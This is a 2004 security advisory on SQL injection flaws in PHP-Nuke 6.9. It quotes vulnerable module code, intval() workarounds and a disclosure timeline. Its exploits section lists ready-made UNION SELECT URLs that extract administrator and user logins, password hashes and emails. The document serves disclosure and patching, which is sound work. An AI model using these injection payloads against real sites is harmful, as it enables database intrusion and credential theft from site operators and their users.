====================================================================== Security Corporation Security Advisory [SCSA-027] PHP-Nuke 6.9 SQL Injection Vulnerability ====================================================================== PROGRAM: PHP-Nuke HOMEPAGE: http://www.phpnuke.org VULNERABLE VERSIONS: 6.9 and Prior RISK: MEDIUM/HIGH IMPACT: SQL Injection RELEASE DATE: 2004-02-01 Security Corporation's Free weekly Newsletter : http://www.security-corporation.com/newsletter.html ====================================================================== TABLE OF CONTENTS ====================================================================== 1..........................................................DESCRIPTION 2..............................................................DETAILS 3.............................................................EXPLOITS 4............................................................SOLUTIONS 5...........................................................WORKAROUND 6..................................................DISCLOSURE TIMELINE 7..............................................................CREDITS 8...........................................................DISCLAIMER 9...........................................................REFERENCES 10............................................................FEEDBACK 1. DESCRIPTION ====================================================================== "PHP-Nuke is a news automated system specially designed to be used in Intranets and Internet. The Administrator has total control of his web site, registered users, and he will have in the hand a powerful assembly of tools to maintain an active and 100% interactive web site using databases" More information is available at http://www.phpnuke.org 2. DETAILS ====================================================================== - SQL Injection : PHP-Nuke contains an exploitable SQL injection vulnerability that can be used by attackers to cause the system to execute arbitrary SQL statements. The first vulnerabilities has been discovered in the /modules/Web_Links/index.php file. Vulnerable code : ---------------------------------------------------- [...] function viewlink($cid, $min, $orderby, $show) { [...] $result = sql_query("select title,parentid from ".$prefix."_links_categories where cid=$cid", $dbi); list($title,$parentid)=sql_fetch_row($result, $dbi); [...] $title=""._MAIN."/$title"; echo "
"._CATEGORY.": $title

"; echo ""; [...] } [...] function brokenlink($lid) { [...] if (is_user($user)) { [...] $result = sql_query("select cid, title, url, description from ".$prefix."_links_links where lid=$lid", $dbi); list($cid, $title, $url, $description) = sql_fetch_row($result, $dbi); OpenTable(); echo "

"; echo "
"; echo ""; echo ""; echo ""; echo ""; echo ""; echo ""; echo ""._THANKSBROKEN."

"; echo "
"; CloseTable(); include("footer.php"); } else { Header("Location: modules.php?name=$module_name"); } } [...] function visit($lid) { global $prefix, $dbi; sql_query("update ".$prefix."_links_links set hits=hits+1 where lid=$lid", $dbi); $result = sql_query("select url from ".$prefix."_links_links where lid=$lid", $dbi); list($url) = sql_fetch_row($result, $dbi); Header("Location: $url"); } [...] function rateinfo($lid) { global $prefix, $dbi; sql_query("update ".$prefix."_links_links set hits=hits+1 where lid=$lid", $dbi); $result = sql_query("select url from ".$prefix."_links_links where lid=$lid", $dbi); list($url) = sql_fetch_row($result, $dbi); Header("Location: $url"); } [...] function viewlinkcomments($lid, $ttitle) { [...] $result=sql_query("SELECT ratinguser, rating, ratingcomments, ratingtimestamp FROM ".$prefix."_links_votedata WHERE ratinglid = $lid AND ratingcomments != '' ORDER BY ratingtimestamp DESC", $dbi); [...] while(list($ratinguser, $rating, $ratingcomments, $ratingtimestamp)=sql_fetch_row($result, $dbi)) { $ratingcomments = stripslashes($ratingcomments); [...] echo "" ."" ."" ."" ."" ."" ."" ."" ."" ."
" ." "._USER.": $ratinguser" [...] echo " $ratingcomments" [...] } [...] function viewlinkeditorial($lid, $ttitle) { [...] $result=sql_query("SELECT adminid, editorialtimestamp, editorialtext, editorialtitle FROM ".$prefix."_links_editorials WHERE linkid = $lid", $dbi); $recordexist = sql_num_rows($result, $dbi); [...] if ($recordexist != 0) { while(list($adminid, $editorialtimestamp, $editorialtext, $editorialtitle)=sql_fetch_row($result, $dbi)) { $editorialtitle = stripslashes($editorialtitle); $editorialtext = stripslashes($editorialtext); [...] echo "
" ."
"._EDITORIALBY." $adminid - $formatted_date

" ."$editorialtext"; [...] } [...] switch($l_op) { [...] case "viewlink": viewlink($cid, $min, $orderby, $show); break; case "brokenlink": brokenlink($lid); break; [...] case "visit": visit($lid); break; case "rateinfo": rateinfo($lid, $user, $title); break; [...] case "viewlinkcomments": viewlinkcomments($lid, $ttitle); break; [...] case "viewlinkeditorial": viewlinkeditorial($lid, $ttitle); break; [...] } ?> ---------------------------------------------------- In every functions we can see an SQL request of the type : select title,parentid from ".$prefix."_links_categories where cid=$cid Once executed, an element of this request is shown to the user. If, in this case with thefonction viewlink(), we give to $cid the value : 0 UNION SELECT pwd,0 FROM nuke_authors The executed SQL request will be then : select title,parentid from nuke_links_categories where cid=0 UNION SELECT pwd,0 FROM nuke_authors We are thus going to go to look for in the table nuke_links_categories fields title and parentid where $cid is worth 0. However, this category does not exist. We are then going to look for in the table nuke_authors the field "pwd". This table contains all the informations about the administrators, the passwords (pwd) being encrypted. The displaying will not be the name of the category, but the coded password of an administrator. The seconds vulnerabilities has been discovered in the /modules/Downloads/index.php file. Vulnerable code : ---------------------------------------------------- function viewdownload($cid, $min, $orderby, $show) { [...] $result2 = sql_query("SELECT cid, title, cdescription FROM ".$prefix."_downloads_categories WHERE parentid=$cid order by title", $dbi); $count = 0; while(list($cid2, $title2, $cdescription2) = sql_fetch_row($result2, $dbi)) { $cresult = sql_query("SELECT * FROM ".$prefix."_downloads_downloads WHERE cid=$cid2", $dbi); $cnumrows = sql_num_rows($cresult, $dbi); echo "
· $t itle2 ($cnumrows)"; [...] if ($cdescription2) { echo "$cdescription2
"; } else { echo "
"; } [...] } [...] function getit($lid) { global $prefix, $dbi; sql_query("update ".$prefix."_downloads_downloads set hits=hits+1 WHERE lid=$lid", $dbi); $result = sql_query("SELECT url FROM ".$prefix."_downloads_downloads WHERE lid=$lid", $dbi); list($url) = sql_fetch_row($result, $dbi); Header("Location: $url"); } [...] function viewdownloadeditorial($lid, $ttitle) { [...] $result=sql_query("SELECT adminid, editorialtimestamp, editorialtext, editorialtitle FROM ".$prefix."_downloads_editorials WHERE downloadid = $lid", $dbi); $recordexist = sql_num_rows($result, $dbi); [...] if ($recordexist != 0) { while(list($adminid, $editorialtimestamp, $editorialtext, $editorialtitle)=sql_fetch_row($result, $dbi)) { [...] echo "
" ."
"._EDITORIALBY." $adminid - $formatted_date

" ."$editorialtext"; [...] } [...] } [...] function viewdownloadcomments($lid, $ttitle) { [...] $result=sql_query("SELECT ratinguser, rating, ratingcomments, ratingtimestamp FROM ".$prefix."_downloads_votedata WHERE ratinglid = $lid AND ratingcomments != '' ORDER BY ratingtimestamp DESC", $dbi); [...] while(list($ratinguser, $rating, $ratingcomments, $ratingtimestamp)=sql_fetch_row($result, $dbi)) { [...} echo "
" ." "._USER.": $ratinguser" ."" .""._RATING.": $rating" ."" ."$formatted_date" ."
" .""._USERAVGRATING.": $useravgrating" ."" .""._NUMRATINGS.": $usertotalcomments" ."
" .""; [...] } [...] } [...] } [...] function modifydownloadrequest($lid) { [...] if ($blocknow != 1) { $result = sql_query("SELECT cid, title, url, description, name, email, filesize, version, homepage FROM ".$prefix."_downloads_downloads WHERE lid=$lid", $dbi); echo "
"; while(list($cid, $title, $url, $description, $auth_name, $email, $filesize, $version, $homepage) = sql_fetch_row($result, $dbi)) { $title = stripslashes($title); $description = stripslashes($description); echo "
" .""._DOWNLOADID.": $lid


" .""._URL.":


"; $result2=sql_query("SELECT cid, title FROM ".$prefix."_downloads_categories order by title", $dbi); echo "" ."" .""._CATEGORY.":

" .""._AUTHORNAME.":


" .""._FILESIZE.": ("._INBYTES.")

" .""._VERSION.":

" .""._HOMEPAGE.":

" ."" .""; } } [...] } [...] function rateinfo($lid) { global $prefix, $dbi; sql_query("update ".$prefix."_downloads_downloads set hits=hits+1 WHERE lid=$lid", $dbi); $result = sql_query("SELECT url FROM ".$prefix."_downloads_downloads WHERE lid=$lid", $dbi); list($url) = sql_fetch_row($result, $dbi); Header("Location: $url"); } [...] switch($d_op) { [...] case "viewdownload": viewdownload($cid, $min, $orderby, $show); break; [...] case "modifydownloadrequest": modifydownloadrequest($lid); break; [...] case "getit": getit($lid); break; [...] case "rateinfo": rateinfo($lid, $user, $title); break; [...] case "viewdownloadcomments": viewdownloadcomments($lid, $ttitle); break; [...] case "viewdownloadeditorial": viewdownloadeditorial($lid, $ttitle); break; [...] } ?> ---------------------------------------------------- We can again notice that in every functions we can see that the SQL request containing a modifiable variable is not filtered. To note that in all this case, and contrary to the usual cases of injection SQL, these problems are present as well when magic_quotes_gpc is ON or OFF. The same problems have been also discovered in the /modules/Sections/index.php file. In mainfile.php file we can see the following code : ---------------------------------------------------- foreach ($_GET as $secvalue) { if ((eregi("<[^>]*script*\"?[^>]*>", $secvalue)) || (eregi("<[^>]*object*\"?[^>]*>", $secvalue)) || (eregi("<[^>]*iframe*\"?[^>]*>", $secvalue)) || (eregi("<[^>]*applet*\"?[^>]*>", $secvalue)) || (eregi("<[^>]*meta*\"?[^>]*>", $secvalue)) || (eregi("<[^>]*style*\"?[^>]*>", $secvalue)) || (eregi("<[^>]*form*\"?[^>]*>", $secvalue)) || (eregi("<[^>]*img*\"?[^>]*>", $secvalue)) || (eregi("\([^>]*\"?[^)]*\)", $secvalue)) || (eregi("\"", $secvalue))) { die ("I don't like you..."); } } foreach ($_POST as $secvalue) { if ((eregi("<[^>]*script*\"?[^>]*>", $secvalue)) || (eregi("<[^>]*style*\"?[^>]*>", $secvalue))) { Header("Location: index.php"); die(); } } ---------------------------------------------------- As we can see, although GET requests are filtered, POST requests aren't. It is thus possible to use the brackets in SQL injection by using a form. 3. EXPLOITS ====================================================================== - SQL Injection : - http://[target]/modules.php?name=Web_Links&l_op=viewlink&cid=1%20UNION%20 SELECT%20pwd,0%20FROM%20nuke_authors%20LIMIT%201,2 - Will display both encrypted passwords of the administrator : http://[target]/modules.php?name=Web_Links&l_op=viewlink&cid=0%20UNION%20SEL ECT%20pwd,0%20FROM%20nuke_authors More information is available at : http://www.security.nnov.ru/search/document.asp?docid=5201 Apparently this fault was already announced, but considering that it was discovered in same times of the others we decided to make a description here. - http://[target]/modules.php?name=Web_Links&l_op=brokenlink&lid=0%20UNION %20SELECT%201,aid,name,pwd%20FROM%20nuke_authors Display the login, the name and the password of an administrator if the link 0 does not exist. - http://[target]/modules.php?name=Web_Links&l_op=visit&lid=-1%20UNION%20 SELECT%20pwd%20FROM%20nuke_authors Re-steer towards the encrypted password. - http://[target]/modules.php?name=Web_Links&l_op=viewlinkcomments&lid=-1%20 UNION%20SELECT%20aid,1,pwd,1%20FROM%20nuke_authors/* Display all the logins administrator as well as their encrypted passwords. - http://[target]/modules.php?name=Web_Links&l_op=viewlinkeditorial&lid=-1 %20UNION%20SELECT%20name,1,pwd,aid%20FROM%20nuke_authors Display logins, names and encrypted passwords of all the administrators. - http://[target]/modules.php?name=Downloads&d_op=viewdownload&cid=-1%20 UNION%20SELECT%20user_id,username,user_password%20FROM%20nuke_users/* Display all the pseudos of the users, followed by their encrypted password. - http://[target]/modules.php?name=Downloads&d_op=modifydownloadrequest& lid=-1%20UNION%20SELECT%200,username,user_id,user_password,name, user_email,user_level,0,0%20FROM%20nuke_users Display logins, ID, encrypted passwords, names, emails and levels of all the registered members. - http://[target]/modules.php?name=Downloads&d_op=getit&lid=-1%20UNION%20 SELECT%20user_password%20FROM%20nuke_users%20WHERE%20user_id=5 - http://[target]/modules.php?name=Downloads&d_op=rateinfo&lid=-1%20UNION%20 SELECT%20user_password%20FROM%20nuke_users%20WHERE%20user_id=5 Re-steer towards the encrypted password of the user id of which is 5. - http://[target]/modules.php?name=Downloads&d_op=viewdownloadcomments& lid=-1%20UNION%20SELECT%20username,user_id,user_password,1%20 FROM%20nuke_users/* http://[target]/modules.php?name=Downloads&d_op=viewdownloadeditorial&lid=-1 %20UNION%20SELECT%20username,1,user_password,user_id%20FROM%20nuke_users Display logins, ID and encrypted password of all the members. - http://[target]/modules.php?name=Sections&op=listarticles&secid=-1%20UNION %20SELECT%20pwd%20FROM%20nuke_authors - http://[target]/modules.php?name=Sections&op=listarticles&secid=-1%20UNION %20SELECT%200,0,pwd,0,0%20FROM%20nuke_authors%20WHERE%201/* - http://[target]/modules.php?name=Sections&op=printpage&artid=-1%20UNION%20 SELECT%20aid,pwd%20FROM%20nuke_authors http://[target]/modules.php?name=Sections&op=viewarticle&artid=-1%20UNION%20 SELECT%200,0,aid,pwd,0%20FROM%20nuke_authors - http://[target]/modules.php?name=Reviews&rop=showcontent&id=-1%20UNION%20 SELECT%200,0,aid,pwd,email,email,100,pwd,url,url,10000,name%20FROM%20nuke_autho rs/* - FORM : --------------------PHPNUKEexploit1.html-------------------- PHP-Nuke 6.9 SQL Injection Vulnerability Exploit

A patch can be found on phpSecure.info
For more informations about this exploit : Security-Corporation.com

--------------------PHPNUKEexploit1.html-------------------- --------------------PHPNUKEexploit2.html-------------------- PHP-Nuke 6.9 SQL Injection Vulnerability Exploit

A patch can be found on phpSecure.info
For more informations about this exploit : Security-Corporation.com

--------------------PHPNUKEexploit2.html-------------------- --------------------PHPNUKEexploit3.html-------------------- PHP-Nuke 6.9 SQL Injection Vulnerability Exploit

A patch can be found on phpSecure.info
For more informations about this exploit : Security-Corporation.com

--------------------PHPNUKEexploit3.html-------------------- 4. SOLUTIONS ====================================================================== You can found patch at the following link : http://www.phpsecure.info The PHP-Nuke Team was notified and the version 7.0 has been fixed. 5. WORKAROUND ====================================================================== In /modules/Web_Links/index.php add the following lines before "switch($l_op) {": ------------------------------------------------------------------------ $cid = intval($cid); $min = intval($min); $lid = intval($lid); $parentid = intval($parentid); ------------------------------------------------------------------------ In /modules/Downloads/index.php add the following lines before "switch($d_op) {": ------------------------------------------------------------------------ $cid = intval($cid); $min = intval($min); $sid = intval($sid); $lid = intval($lid); $cat = intval($cat); ------------------------------------------------------------------------ In /modules/Reviews/index.php add the following lines before "switch($rop) {": ------------------------------------------------------------------------ $id = intval($id); $cid = intval($cid); ------------------------------------------------------------------------ In /modules/Sections/index.php add the following lines before "switch($op) {": ------------------------------------------------------------------------ $artid = intval($artid); $secid = intval($secid); ------------------------------------------------------------------------ In /modules/Stories_Archive/index.php add the following line before "switch($sa) {": ------------------------------------------------------------------------ $min = intval($min); ------------------------------------------------------------------------ 6. DISCLOSURE TIMELINE ====================================================================== 30/12/2003 Vulnerability discovered 30/12/2003 Vendor notified 06/01/2004 Vendor response 06/01/2004 Security Corporation clients notified 06/01/2004 Started e-mail discussions 31/01/2004 Last e-mail received 01/02/2004 Public disclosure 7. CREDITS ====================================================================== Germain Randaxhe aka frog-m@n from http://www.phpsecure.info is credited with this discovery 8. DISLAIMER ====================================================================== The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties with regard to this information. In no event shall the author be liable for any damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk. 9. REFERENCES ====================================================================== - Original Version: http://www.security-corporation.com/advisories-027.html - Version Française: http://www.security-corporation.com/index.php?id=advisories&a=027-FR 10. FEEDBACK ====================================================================== Please send suggestions, updates, and comments to: Security Corporation http://www.security-corporation.com advisory@security-corporation.com